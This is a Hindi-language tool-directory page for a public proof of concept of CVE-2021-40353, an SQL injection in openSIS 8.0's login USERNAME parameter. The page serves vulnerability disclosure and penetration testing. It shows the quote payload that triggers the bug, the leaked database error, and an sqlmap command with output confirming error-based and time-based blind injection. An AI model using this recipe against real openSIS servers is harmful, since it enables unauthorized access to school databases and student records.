Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40353 — CVE-2021-40353 openSIS 8.0 SQL Injection भेद्यता | Kitploit
उपकरण/GitHubGitHub/5qu1n7/cve-2021-40353
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHub5qu1n7/cve-2021-40353

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 SQL Injection भेद्यता

रिपॉजिटरी देखें
5225 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 SQL इंजेक्शन भेद्यता https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

MySQL या MariaDB को एप्लिकेशन डेटाबेस के रूप में उपयोग करने पर openSIS संस्करण 8.0 में SQL इंजेक्शन भेद्यता मौजूद है। हमलावर USERNAME पैरामीटर के माध्यम से SQL कमांड जारी कर सकता है।

असुरक्षित PHP पेज:

index.php - USERNAME पैरामीटर

असुरक्षित पेलोड ' - डेटाबेस जानकारी के साथ एक त्रुटि उत्पन्न करेगा " - त्रुटि उत्पन्न नहीं करता

त्रुटि

दिनांक:

08/31/2021 03:16:22

असफलता सूचना:

DB Execute Failed

SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback: C:\xampp\htdocs\opensis\index.php at 502 अतिरिक्त जानकारी: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''user1'')' at line 1 दिनांक:

08/31/2021 03:16:22

root@kitploit:~
openSIS को एक त्रुटि का सामना करना पड़ा है जो निम्नलिखित में से किसी के कारण हो सकती है:

अमान्य डेटा इनपुट
डेटाबेस SQL त्रुटि
प्रोग्राम त्रुटि

कृपया इस स्क्रीनशॉट को लें और डिबगिंग और समाधान के लिए अपने openSIS प्रतिनिधि को भेजें।

sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

खोजकर्ता: Brian Lowe, अगस्त 2021

टूल डाउनलोड करें